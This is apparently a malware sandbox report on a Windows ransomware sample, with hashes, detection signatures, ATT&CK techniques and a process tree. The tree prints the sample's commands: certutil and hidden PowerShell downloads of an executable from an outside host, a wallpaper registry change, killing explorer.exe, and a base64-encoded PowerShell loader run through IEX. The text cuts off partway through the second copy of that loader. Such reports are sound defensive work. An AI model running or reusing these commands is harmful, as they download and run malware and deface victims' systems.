4bca676ffaa2cb5efc21e0de18a6fae4199b8d5ccc77c16a7bd47ce01c05c67c

Analysis

max time kernel
108s
max time network
102s
platform
windows7_x64
resource
win7-20220812-en
resource tags

arch:x64arch:x86image:win7-20220812-enlocale:en-usos:windows7-x64system
submitted
27-10-2022 11:03

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

4c49d75b4a0e0556742d45a1d3bade40f0e43bce7f9b2f1449845a27819e1b44.exe
Size

1.3MB
MD5

1413f3a72c00016297bc8744b5810673
SHA1

2e94c7d72488dec9a4e69eb8939129ec1ab8857a
SHA256

4c49d75b4a0e0556742d45a1d3bade40f0e43bce7f9b2f1449845a27819e1b44
SHA512

d21f1f893575039c33614c79725ccd5d1afbb9fd4eb7a2267280188b8cf426f3ed65b3d92688965cda422cf382e632c40d941109fa1da33b49b4e1e0400c3391
SSDEEP

24576:pC4ob9SyKiqD3UIGTMoJamOGRnC9CuQ5O3h3WMtbY:wWiqwI8h3MtbY

Score

10^/10

ransomware

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

http://art-cure.com/upload/ls-sky.exe

Signatures

Blocklisted process makes network request 1 IoCs

flow	pid	Process
6	1908	powershell.exe

Downloads MZ/PE file

Executes dropped EXE 1 IoCs

pid	Process
1644	update.exe

Loads dropped DLL 4 IoCs

pid	Process
1508	cmd.exe
1644	update.exe
1644	update.exe
1644	update.exe

Sets desktop wallpaper using registry 2 TTPs 3 IoCs

ransomware

Defacement

T1491

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Pictures\\desktop.jpg"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Pictures\\desktop.jpg"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Pictures\\desktop.jpg"	reg.exe

Kills process with taskkill 1 IoCs

evasion

pid	Process
1648	taskkill.exe

Suspicious behavior: EnumeratesProcesses 3 IoCs

pid	Process
1732	powershell.exe
1908	powershell.exe
1696	powershell.exe

Suspicious use of AdjustPrivilegeToken 4 IoCs

description	pid	Process
Token: SeDebugPrivilege	1648	taskkill.exe
Token: SeDebugPrivilege	1908	powershell.exe
Token: SeDebugPrivilege	1732	powershell.exe
Token: SeDebugPrivilege	1696	powershell.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2016 wrote to memory of 1636	2016	4c49d75b4a0e0556742d45a1d3bade40f0e43bce7f9b2f1449845a27819e1b44.exe	28
PID 2016 wrote to memory of 1636	2016	4c49d75b4a0e0556742d45a1d3bade40f0e43bce7f9b2f1449845a27819e1b44.exe	28
PID 2016 wrote to memory of 1636	2016	4c49d75b4a0e0556742d45a1d3bade40f0e43bce7f9b2f1449845a27819e1b44.exe	28
PID 2016 wrote to memory of 1636	2016	4c49d75b4a0e0556742d45a1d3bade40f0e43bce7f9b2f1449845a27819e1b44.exe	28
PID 1636 wrote to memory of 1732	1636	cmd.exe	29
PID 1636 wrote to memory of 1732	1636	cmd.exe	29
PID 1636 wrote to memory of 1732	1636	cmd.exe	29
PID 1636 wrote to memory of 1732	1636	cmd.exe	29
PID 2016 wrote to memory of 988	2016	4c49d75b4a0e0556742d45a1d3bade40f0e43bce7f9b2f1449845a27819e1b44.exe	30
PID 2016 wrote to memory of 988	2016	4c49d75b4a0e0556742d45a1d3bade40f0e43bce7f9b2f1449845a27819e1b44.exe	30
PID 2016 wrote to memory of 988	2016	4c49d75b4a0e0556742d45a1d3bade40f0e43bce7f9b2f1449845a27819e1b44.exe	30
PID 2016 wrote to memory of 988	2016	4c49d75b4a0e0556742d45a1d3bade40f0e43bce7f9b2f1449845a27819e1b44.exe	30
PID 988 wrote to memory of 1756	988	cmd.exe	31
PID 988 wrote to memory of 1756	988	cmd.exe	31
PID 988 wrote to memory of 1756	988	cmd.exe	31
PID 988 wrote to memory of 1756	988	cmd.exe	31
PID 1756 wrote to memory of 1552	1756	cmd.exe	33
PID 1756 wrote to memory of 1552	1756	cmd.exe	33
PID 1756 wrote to memory of 1552	1756	cmd.exe	33
PID 1756 wrote to memory of 1552	1756	cmd.exe	33
PID 2016 wrote to memory of 868	2016	4c49d75b4a0e0556742d45a1d3bade40f0e43bce7f9b2f1449845a27819e1b44.exe	36
PID 2016 wrote to memory of 868	2016	4c49d75b4a0e0556742d45a1d3bade40f0e43bce7f9b2f1449845a27819e1b44.exe	36
PID 2016 wrote to memory of 868	2016	4c49d75b4a0e0556742d45a1d3bade40f0e43bce7f9b2f1449845a27819e1b44.exe	36
PID 2016 wrote to memory of 868	2016	4c49d75b4a0e0556742d45a1d3bade40f0e43bce7f9b2f1449845a27819e1b44.exe	36
PID 868 wrote to memory of 1888	868	cmd.exe	37
PID 868 wrote to memory of 1888	868	cmd.exe	37
PID 868 wrote to memory of 1888	868	cmd.exe	37
PID 868 wrote to memory of 1888	868	cmd.exe	37
PID 2016 wrote to memory of 1160	2016	4c49d75b4a0e0556742d45a1d3bade40f0e43bce7f9b2f1449845a27819e1b44.exe	38
PID 2016 wrote to memory of 1160	2016	4c49d75b4a0e0556742d45a1d3bade40f0e43bce7f9b2f1449845a27819e1b44.exe	38
PID 2016 wrote to memory of 1160	2016	4c49d75b4a0e0556742d45a1d3bade40f0e43bce7f9b2f1449845a27819e1b44.exe	38
PID 2016 wrote to memory of 1160	2016	4c49d75b4a0e0556742d45a1d3bade40f0e43bce7f9b2f1449845a27819e1b44.exe	38
PID 1160 wrote to memory of 1076	1160	cmd.exe	39
PID 1160 wrote to memory of 1076	1160	cmd.exe	39
PID 1160 wrote to memory of 1076	1160	cmd.exe	39
PID 1160 wrote to memory of 1076	1160	cmd.exe	39
PID 2016 wrote to memory of 1120	2016	4c49d75b4a0e0556742d45a1d3bade40f0e43bce7f9b2f1449845a27819e1b44.exe	41
PID 2016 wrote to memory of 1120	2016	4c49d75b4a0e0556742d45a1d3bade40f0e43bce7f9b2f1449845a27819e1b44.exe	41
PID 2016 wrote to memory of 1120	2016	4c49d75b4a0e0556742d45a1d3bade40f0e43bce7f9b2f1449845a27819e1b44.exe	41
PID 2016 wrote to memory of 1120	2016	4c49d75b4a0e0556742d45a1d3bade40f0e43bce7f9b2f1449845a27819e1b44.exe	41
PID 1120 wrote to memory of 708	1120	cmd.exe	42
PID 1120 wrote to memory of 708	1120	cmd.exe	42
PID 1120 wrote to memory of 708	1120	cmd.exe	42
PID 1120 wrote to memory of 708	1120	cmd.exe	42
PID 1076 wrote to memory of 384	1076	cmd.exe	43
PID 1076 wrote to memory of 384	1076	cmd.exe	43
PID 1076 wrote to memory of 384	1076	cmd.exe	43
PID 1076 wrote to memory of 384	1076	cmd.exe	43
PID 2016 wrote to memory of 428	2016	4c49d75b4a0e0556742d45a1d3bade40f0e43bce7f9b2f1449845a27819e1b44.exe	44
PID 2016 wrote to memory of 428	2016	4c49d75b4a0e0556742d45a1d3bade40f0e43bce7f9b2f1449845a27819e1b44.exe	44
PID 2016 wrote to memory of 428	2016	4c49d75b4a0e0556742d45a1d3bade40f0e43bce7f9b2f1449845a27819e1b44.exe	44
PID 2016 wrote to memory of 428	2016	4c49d75b4a0e0556742d45a1d3bade40f0e43bce7f9b2f1449845a27819e1b44.exe	44
PID 1076 wrote to memory of 1688	1076	cmd.exe	45
PID 1076 wrote to memory of 1688	1076	cmd.exe	45
PID 1076 wrote to memory of 1688	1076	cmd.exe	45
PID 1076 wrote to memory of 1688	1076	cmd.exe	45
PID 1076 wrote to memory of 1688	1076	cmd.exe	45
PID 1076 wrote to memory of 1688	1076	cmd.exe	45
PID 1076 wrote to memory of 1688	1076	cmd.exe	45
PID 428 wrote to memory of 1180	428	cmd.exe	46
PID 428 wrote to memory of 1180	428	cmd.exe	46
PID 428 wrote to memory of 1180	428	cmd.exe	46
PID 428 wrote to memory of 1180	428	cmd.exe	46
PID 2016 wrote to memory of 268	2016	4c49d75b4a0e0556742d45a1d3bade40f0e43bce7f9b2f1449845a27819e1b44.exe	47

Views/modifies file attributes 1 TTPs 9 IoCs

evasion

Hidden Files and Directories

T1158

pid	Process
1888	attrib.exe
1160	attrib.exe
1732	attrib.exe
1384	attrib.exe
1876	attrib.exe
1472	attrib.exe
1272	attrib.exe
1804	attrib.exe
708	attrib.exe

C:\Users\Admin\AppData\Local\Temp\4c49d75b4a0e0556742d45a1d3bade40f0e43bce7f9b2f1449845a27819e1b44.exe
"C:\Users\Admin\AppData\Local\Temp\4c49d75b4a0e0556742d45a1d3bade40f0e43bce7f9b2f1449845a27819e1b44.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:2016
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c attrib +h windata.bat
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1636
- - C:\Windows\SysWOW64\attrib.exe
    attrib +h windata.bat
    3⤵
    - Views/modifies file attributes
    PID:1732
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c start windata.bat
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:988
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /K windata.bat
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1756
  - - C:\Windows\SysWOW64\certutil.exe
      certutil -urlcache -split -f http://art-cure.com/upload/image.jpg
      4⤵
      PID:1552
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c attrib +h win32.bat
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:868
- - C:\Windows\SysWOW64\attrib.exe
    attrib +h win32.bat
    3⤵
    - Views/modifies file attributes
    PID:1888
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c start win32.bat
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1160
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /K win32.bat
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1076
  - - C:\Windows\SysWOW64\reg.exe
      reg add "HKEY_CURRENT_USER\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d C:\Users\Admin\Pictures\desktop.jpg /f
      4⤵
      Sets desktop wallpaper using registry
      PID:384
  - - C:\Windows\SysWOW64\rundll32.exe
      RUNDLL32.EXE user32.dll ,UpdatePerUserSystemParameters
      4⤵
      PID:1688
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c attrib +h winlog.bat
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1120
- - C:\Windows\SysWOW64\attrib.exe
    attrib +h winlog.bat
    3⤵
    - Views/modifies file attributes
    PID:708
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c start winlog.bat
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:428
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /K winlog.bat
    3⤵
    PID:1180
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell -nop -w hidden (new-object System.Net.WebClient).DownloadFile( 'http://art-cure.com/upload/ls-sky.exe','update.exe')
      4⤵
      Blocklisted process makes network request
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1908
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /IM explorer.exe /F
  2⤵
  PID:268
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /IM explorer.exe /F
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:1648
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c powershell -nop -w hidden -encodedcommand JABzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgALABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIASAA0AHMASQBBAEEAQQBBAEEAQQBBAEEAQQBLADEAWABiAFgATwBpAHkAaABMACsASABIADgARgBIADEASwBsAFYAbwB4AEIATQBXAHIAMgAxAEYAWQB0AEkAaQBBAEsAdgBxAEcAWQBtAEoATgBLAEEAVABNAHEAaABuAGMARwBoAEoAegBkAC8AMwA0AGEAMQBKAHoAcwAyAGUAVABlAHIAYgByAFgASwBvAHQAaABwAHIAdQBuADUAKwBtAG4AZQB4AG8AVgBrADIAdQBWAGgASgBaAEoARgBBADkAaAA2AGwAcgBEAFkAVwBSADUATAB0AFUAcwBsAFMANwA3AG4AawBTAG8AcgA5AFMAMwBjAG0AawBUAHUAeQBiAEoAcAAvAFAAQgA4AHgAYQBUAFoAegAvADAAegBHAGMAZABvAFIAQgBIAEUAZgBWAFgANgBXAEsAcQBoADcAcABEAFYAUwA0AFQAUABYAHgAMgBQAEIAVABiAHUARQBZAFYATAA3AGsAZwBSAG4ARwBJAHEAeABjAFgAcABZAHQAaQBLAG4AWQBqAGYAWQBPAGYAWABaADEAWQBDAFgANQAyAE0ATgBsADUASwBJAEsATgBLAG8AKwBzADcALwBjADkAUgA3AGYAYwBwAHkAOQBmAHUARABnAE0AcwBVAHUATwA3ADMAVQBSAEUAegBhAEsAcwBHAFAAWQBGAG8ANABxAFYAZQBvADcAdABkAHIAaABFAEYAOQBQAGoARAAwADIAQwBmAFUAWABkAGYAbABjAEYAMgAzAFAAMABPADIAVABXAE0AYgBwADUAZwA0AE8AeABMAG8AbwBYADUATQA5AFUAOAA5AFAAVQBGAGQAOQAyAHkASwBWADgAcAA5AC8AbABxAHUAUAAxADQAMgBuAE8AaAAvAEUAdQBoADEAVgB5AG0AbwBXAEUAZQB6AFUAawBXADIAWABxADkAUwBQAGEAcgA3AGgASQB2AE4AeABwAGEAeABZAFoAdQBoAEYAMwBvAGIAVQBWADUAYgBMAE4ATwB2AEwAdwB2AHQAeAA0AGIAeAB5ADkATAAxAGMAUABaADEAcwA2ACsAdAB3AGoAcwA4AFAAbQBWAHMAOQA2AGwAVABLAE0ASgB3AEMATgB1AHcAUgB3ADMASwBOAGUAcwB6ADMAZQAzAHgANgBvAHIANgA5AGUAVABPAFAAWABXAEkANQB1AEMANgA1AEIASQBlAGUAcgArAEkAdwBzAFUAdwBjADEAUQBlADYAaQAyAHcAOAB4AHgAdABRAEsAMABjAFEAUABuAGQAYgByAG8ASQBUAEkAUwBaAHgANgBGAEoAbgBYADAAQQB2ADgAVgA1AHcANQBkAEsATgBiAGIAcwBHAGQAaAA5AC8AMQArADUAVABaAFkAdwBQAFoAMwBCAC8AVgA2AG4AeQBYAGcAbQBrAHAAaQBTAHMAMQBrADYAYwArAEIAMAA0AGwASQBJADMAUgAzAE4AdwBuAEYAKwA4AGYAMABlAHUASwB2AHgAKwBJAFYAaQAxADkASwBQADAAQQBWAFUAUgB0AHYARgBXAEoALwBpAFoAQQBMADcAdgB1AEYAcQA2AHUASABnAHMAaABoAGoATwBVADUAbAA2AGsAVgBYAG8AZgBhAFgAbwBHAHEAVwBBAEUAegByAHgAdwBpAHcAUAA1AHkASwBNAGMAZgBYAHAAbgAvAGcAYwB0AHoAMQByAFIAcgBWAFAARABUAFgATwBXAGkAZQBkAFkAMwBpAE8AZgBuAHkAbABIAGoAWABQAFEAawArAGwAaQAyAHIAcAB4AEoANQA4AC8AdABtAEkATABSAHYAaABNAEYALwAvAFAAQgB2ADYAZQBHAE8ANQB1AEoAKwA1AHUAbQBPAFoAWgA4AEoAWABQAG8AbwBaADMAdABpADQAdwBLAE4AKwBGAGgAdQBEAG4ANQBYAHkAYQBRAEcAagAvAGcAbQBkAGMAZwA3AG8ANAA2ADkAcQB2AEcATwBSAE4AOQAzAGUAMABUAG4AVwBoAEwAaABIADQAQgBWAFEAbwB2AHEAegBNADgAYwBZAFYAcwBxAFMAcQAyAEEASAA4AEQAdQArAEEAMAAwAHYATgA1AEIAbQArAEMAeAA5AFMAcQAzAHMAdgBIAHYAKwBuAG4ATwBaAHMALwBVAG8AcQBsAEgAVABHAFAATABjAHIARgBFAHEAMQBtADIATQBhAGgAVAByAFIAdABaAHAAaQBZADIASgBWAHcAegBMAC8ANwBpAHIAeABEAGEAeABUAEQAMABpAFoAMwBOAFAAMQBRADgAZwBQAFcAMwBOAGUAUwA1AGsAVABHAHgAQwBkAEEARwBHAGgAZQBwAGoAMAA5AEwAdABIAEoAVQBhAE4AYgBBAFEANwBtAFcAcQB0AFQAMgA3AFUAUAA0AFEARQAwADYAMwBiAFUAZwA1AHMASgBSAEEAVABHAEEAbQB4ADAASQBsAE8AVwBkAEMAVgBQAHMAMwBQADYAcAAxAEYAUgBQAEoAOABXADMAcwBnAEgAUgBSAGgAUQBSAGIAMwAwAEwATgBPAFcAVgBVAFEAVABkADkAaQAxAEgANQBQADcAaAA5AHoAcABOAGoAVQB1AFIAWQBuAFUARgA2ADUAegBRAFEAUQBMAFUAOQBVAHEATQAwAEsAeQBSAFEAMQA4AHEAMQBYADQAagAzAHYANwBuADMAYwA0AG4ANQB5AFUAMAB1AHgASwBkAEEAVgBvAHAARQBmAE8AeABsAEoARQArAFgAUQB0AEwATQBMADUAZQB2AGIAMQBnAFcAeQBJAFUARQBVAEIATgBDAHoAKwBuAHAARQBXADYAMwAxAEsASwBNAFYAYwBwAE0ATgB3ADYAawBUAE4AbgBQADIAcQBIAEkASgA4AEkAZwBHAFAAQQBMACsAQwBmAHcAWgB3AEsAQgBsACsAWABoADMATwAvAE4AWgBaAE8AUABKADkATQBCAFAAZAB4AEkAcwAyADYALwBGAFIAOQBpAEsAVgA3ADAAYQBFAGEAZwBRAGUANAAxAEUAUABtAE4AbABFAHkAOABoADAAYgBzAHQAQgByAEkAbAA1AEkAeAB6AEUAVwBkAFkAQgBEADEAcABhAFQAUABEAHAAcQBCAEoANwBTADMAMQB0ADMASgB6AGwARgAvAFoAaAB3AGEAeAByADAAawBkAEEAeABSAGEAQQAyADAAUwBNAGoAbABCADEATABTAEUAdwBMAHUAegBvAFAAeABqAFoAUgB3ADMAaABEADAAdQBtADMAZgA3AFIAMQBRAEMALwBQAEQATgByADYAWAB6AFEATgBEAHUAbABqAGYAcAB0AGwASQB1ADEATABwAGgAcQBoAGwAWQAxAG4AagAvAGIASABxAEkAdABsAG8AegBJAFQAaAArAEwAWABKAGsANQBSAEcAZwB6AG0ATgArAEcAaQBOAHQASQBCAG4AcABzAGIASQBoADMATgBLAHoARgBaAHQAdQA4AE4ATQBWAFgAdQBaACsAVQBKAHUARgBFAHYAWgBtADQATwB4AGoARQBaAEIAOQB4AGEAOQBOAGoATgBoADMAQQBJAGMAVQBqAFYAVABkAGcAOQB0AGwASgByADMAdwBzAEcAOABIADgAdgBaADQARwBFAHMAZwB0ADAAZwBYAG0AMQBiAEEAMABWAGwAdwBMAGEASwAwAGcATgBhAFIAcABQAGgAZwBqAHcAdwBVADkAMQBwAFoAWgBuAGIANABxAFMAOQBsAE0AcQBtAFQANwBUADcAWQBUAHYAVQBNADgANgBYAEwAVwB6ADAATgBpAFQAWABIAGMAcgByADcAZgBDAE8ASgAwAGYALwBWAEgAVwBlAEkAYgBCAHQARAB4AGIAOQBFAGQAaAAyAE8AVQBXAEIAVwBPAGkAMwBBAGwANgBDAHoAQwBpAHkAdwBGAFkAMwBEAEMAVAB3AE0AVwB2AHYAVABXAFoAOABVAEYAYgBwAHoATgBDAHMAYQBUAE4ATAByAEsARABmAGIATgAvAGUAYQBMADUAKwB2ACsASgBrAFkAWgAxAHkANABVAFQAdQBjAEwATgBPAHgATwAyAHkAeQBKAEkAOQBqAGsAaQBIAGMARABEAGMATwBIAFoAbgB4AFUAMwBsAGQATwBIAFkAMwBaADQAVQBXAHEAcwBYADIAKwBtAHYAYgAxAC8AMgBLADkAegBYAGsAdwBZAGEATAA1AG0AbQBsAGkANwBEAEoAQgB3AGwAZABNAHYAZQB6AGcAeAB2ADQAawB2AE0AZQBqAGEAMwArAGMAbgBEAHkAMQB4AGMAYQBPAGEAYQBiAGQANABxAHEANgBVAC8AWABkAEMAUwBJAGgAegBvAEIAWABzAGcANwBJAEsALwBYAGMAeABzAE4ASgBvAHQANwAwAFMAUgBIAGMAZQBtADYARAB0AHMARwBvADMANQBkAE4AdABIAEUASQA4ADUAbgBTADYAWAA3AEoAZwBnAGMATABzAC8AbAB4ADUAWQBCAHMAMwBWAEYANQBUAGIASwAyAHkAQQB6AGcANAB4AHcAbwBIAGYAOABTAHQAaAB4ADIAdQBjADEAZgBLAGwAMQA1AGUAMgBaAE4AQwBRAEgAUwAwAHkANAAxAG8ASwBnADcAbQBHADkAaQBwAHIAMAA4ADYASwBOAG0ALwBDADQAVQBKADYATgBZAFkAeABjADYAZAB3AFYAbgBaAFAAYgA2AFUAWQBUADYANwBNADIAdwAxAC8AVwBQAFMARAB4AE4AVABaAEgAdQBQAFAARwBWAHMATwBBAHoAegBiADkAdQA0AEcAcQBDAFgARwBsAG8AZwBjAGUAVABWAHEAWgA2ADQAOABlAFIARgBhAG4AQwBKAHMAKwBuAHgAagBsAE0AdwBTAFQAUQB3AFEAaQArAFMAcgBTAE8AeQB1ADUAbQA3AFEANgBTAGoATABuAHQAMQAyAGwAYgB1AE8ANQAyAHUAagBYAGsAYgBIADMAaABxAE4AZQBnAGMAbAAzAHMANwBFAGoAZAAvAHQAYgBnAC8ASgByAG4ASABEACsAQQBzAEYARAAzAGYARwBnAEoANwBpAEIAcgBNAEkANwBtAFkAUAA1AHIAMABrAHQAZwBWAHAAdgAxAHIAMABHAG0AMgBhADQAQwBCAGkAdABHADEAOABrADEAcQBxAE0AbABxAHoAaQA5ADEAOABPAFoAbQBrADMARwBMAGQAYQBNAHEANwBoADEAawA0AEcAagBVAG0AQgA3AHYAUAAzAEsARABrAC8AawBIADAAVwBUAEcAOQA1AFIAZwBuAGQAbgBhAHgAWQBqAE4AdABmADAARABiAHQAQwB3AHAAUgBzACsANgBHAHIASgBwAG8AUABlAEUAMwBmAEIAbQAzAFQAYQB0AHMAVQB6AGYANgBqADAARQBQAEYAVgBYAFkAMQBsADYAQgBUADcAVAAwAFYANQBxAEsAbgB2AEUAawA4ADYATwA2AFkAdgBBAHcANABNAEQAZgBBAEUAZQBXAFYAZgB1ADgAQgBCAEUAdwBOAE4ATQA2AFUAdgBaAE8ATwBkAHEAUwB2AFMAdwBWADMAQwAxAHMAYgBFAEQAYgBtAGEAMQBSAHMAWgBlAGkAOQBhAGQAbABoAEsAUABHAFAASgBxADgAagB0AHYARAByAEgAUwB4AEEATwB0AHcAbgBNAGgAWgBFAG8AcQBNAEoAcQBSAFYANgBPAE4ARgAwAEoALwBrAGUAWgAzADkAaAA4AFUAUABLADkAdABRAHIAMwBWAEcANgBnAHkAVQBNAEQAeQArAGEAdQByAGEAbgA3AHYAdgA2ADAAOABYAHEAWgBQADUAegA3AHQANwBmADMAYQBTAE0ARQBhAGMANQB2AFgAcgBtAEkAbAAwAGQAOQBWAHIATQArAGEASAAwAFUAUABvADUAMQB1AFEAeQBXAEQAQgB1AFoAOAAvAFEAaABlAEsASgB6AGEAawBLAGwAbgA1AFIAcQBWAHkAcwBlAGQAOAB3AHMATwBYAFcAeABEAFYAdwBsADkANQA3AGwAbwBzADcAYgB0AG0AWABuAGoAOQBFAGsASABBADIAMwBjAHMAYgBsADYAZwBzAHQAcABDAFUATwBtACsAZQBHAG8AUwByADAASgBRAHIAZAAwAFAASgBNAFIAYgB6AFoARgBjADMARQA2ADQAYgBuAEgATwBnAHQAKwArAGIASwBHADQAOQBYAGUAZwBTAGgAagBkADAAdAAyAE4AWQBwAE8ARwBaAHEAbQA4ADIAZQBMAHIAcABaACsASAB4AGIATwA4ADcAUABLAG0ANwBsAGEAMwBsAHkAOQA4ACsAVAA5AFQAbgBhAHgAVQAvAFcARQBmAGgAaQA3AEQAdgA0AC8AQgB1AEMAbgBUAGYAOAA3AHQARABsADQAUgBYAC8AMgBCAGwAMwBoADAATQBkADQAVgBVAHYAbABiADYAVwBTAHQASwBIAGUAegBVAGYAVwBLADMAeAA5ADQASQBEAHEARgB0AHkATABnAE8AYgBrAGUAdQA4AFoAOABLAGwAUwAzAEwAMgBWAFMANwAxAEsAUwBmAHcAOQBkAGEAbABUAFAANgBoAHIATwBCADQAYgBNAFUAMwA0AFgAZwBtADMAYwBYADQAUgBVADgAZgBQAHIAKwAvAFUAUQBiAGUATwBpAHQAKwBwAE8AVABZAHgAdABNAC8AWABRADgAOABBAGwAbQBMAG8AcAAzAEwAVABoAFoARgBjAEcATwBiACsAQgByADAAbQB5AHgAegBQAEQAUQBBAEEAIgApACkAOwBJAEUAWAAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAFMAdAByAGUAYQBtAFIAZQBhAGQAZQByACgATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEcAegBpAHAAUwB0AHIAZQBhAG0AKAAkAHMALABbAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgBNAG8AZABlAF0AOgA6AEQAZQBjAG8AbQBwAHIAZQBzAHMAKQApACkALgBSAGUAYQBkAFQAbwBFAG4AZAAoACkAOwA=
  2⤵
  PID:1504
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    powershell -nop -w hidden -encodedcommand JABzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgALABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIASAA0AHMASQBBAEEAQQBBAEEAQQBBAEEAQQBLADEAWABiAFgATwBpAHkAaABMACsASABIADgARgBIADEASwBsAFYAbwB4AEIATQBXAHIAMgAxAEYAWQB0AEkAaQBBAEsAdgBxAEcAWQBtAEoATgBLAEEAVABNAHEAaABuAGMARwBoAEoAegBkAC8AMwA0AGEAMQBKAHoAcwAyAGUAVABlAHIAYgByAFgASwBvAHQAaABwAHIAdQBuADUAKwBtAG4AZQB4AG8AVgBrADIAdQBWAGgASgBaAEoARgBBADkAaAA2AGwAcgBEAFkAVwBSADUATAB0AFUAcwBsAFMANwA3AG4AawBTAG8AcgA5AFMAMwBjAG0AawBUAHUAeQBiAEoAcAAvAFAAQgA4AHgAYQBUAFoAegAvADAAegBHAGMAZABvAFIAQgBIAEUAZgBWAFgANgBXAEsAcQBoADcAcABEAFYAUwA0AFQAUABYAHgAMgBQAEIAVABiAHUARQBZAFYATAA3AGsAZwBSAG4ARwBJAHEAeABjAFgAcABZAHQAaQBLAG4AWQBqAGYAWQBPAGYAWABaADEAWQBDAFgANQAyAE0ATgBsADUASwBJAEsATgBLAG8AKwBzADcALwBjADkAUgA3AGYAYwBwAHkAOQBmAHUARABnAE0AcwBVAHUATwA3ADMAVQBSAEUAegBhAEsAcwBHAFAAWQBGAG8ANABxAFYAZQBvADcAdABkAHIAaABFAEYAOQBQAGoARAAwADIAQwBmAFUAWABkAGYAbABjAEYAMgAzAFAAMABPADIAVABXAE0AYgBwADUAZwA0AE8AeABMAG8AbwBYADUATQA5AFUAOAA5AFAAVQBGAGQAOQAyAHkASwBWADgAcAA5AC8AbABxAHUAUAAxADQAMgBuAE8AaAAvAEUAdQBoADEAVgB5AG0AbwBXAEUAZQB6AFUAawBXADIAWABxADkAUwBQAGEAcgA3AGgASQB2AE4AeABwAGEAeABZAFoAdQBoAEYAMwBvAGIAVQBWADUAYgBMAE4ATwB2AEwAdwB2AHQAeAA0AGIAeAB5ADkATAAxAGMAUABaADEAcwA2ACsAdAB3AGoAcwA4AFAAbQBWAHMAOQA2AGwAVABLAE0ASgB3AEMATgB1AHcAUgB3ADMASwBOAGUAcwB6ADMAZQAzAHgANgBvAHIANgA5AGUAVABPAFAAWABXAEkANQB1AEMANgA1AEIASQBlAGUAcgArAEkAdwBzAFUAdwBjADEAUQBlADYAaQAyAHcAOAB4AHgAdABRAEsAMABjAFEAUABuAGQAYgByAG8ASQBUAEkAUwBaAHgANgBGAEoAbgBYADAAQQB2ADgAVgA1AHcANQBkAEsATgBiAGIAcwBHAGQAaAA5AC8AMQArADUAVABaAFkAdwBQAFoAMwBCAC8AVgA2AG4AeQBYAGcAbQBrAHAAaQBTAHMAMQBrADYAYwArAEIAMAA0AGwASQBJADMAUgAzAE4AdwBuAEYAKwA4AGYAMABlAHUASwB2AHgAKwBJAFYAaQAxADkASwBQADAAQQBWAFUAUgB0AHYARgBXAEoALwBpAFoAQQBMADcAdgB1AEYAcQA2AHUASABnAHMAaABoAGoATwBVADUAbAA2AGsAVgBYAG8AZgBhAFgAbwBHAHEAVwBBAEUAegByAHgAdwBpAHcAUAA1AHkASwBNAGMAZgBYAHAAbgAvAGcAYwB0AHoAMQByAFIAcgBWAFAARABUAFgATwBXAGkAZQBkAFkAMwBpAE8AZgBuAHkAbABIAGoAWABQAFEAawArAGwAaQAyAHIAcAB4AEoANQA4AC8AdABtAEkATABSAHYAaABNAEYALwAvAFAAQgB2ADYAZQBHAE8ANQB1AEoAKwA1AHUAbQBPAFoAWgA4AEoAWABQAG8AbwBaADMAdABpADQAdwBLAE4AKwBGAGgAdQBEAG4ANQBYAHkAYQBRAEcAagAvAGcAbQBkAGMAZwA3AG8ANAA2ADkAcQB2AEcATwBSAE4AOQAzAGUAMABUAG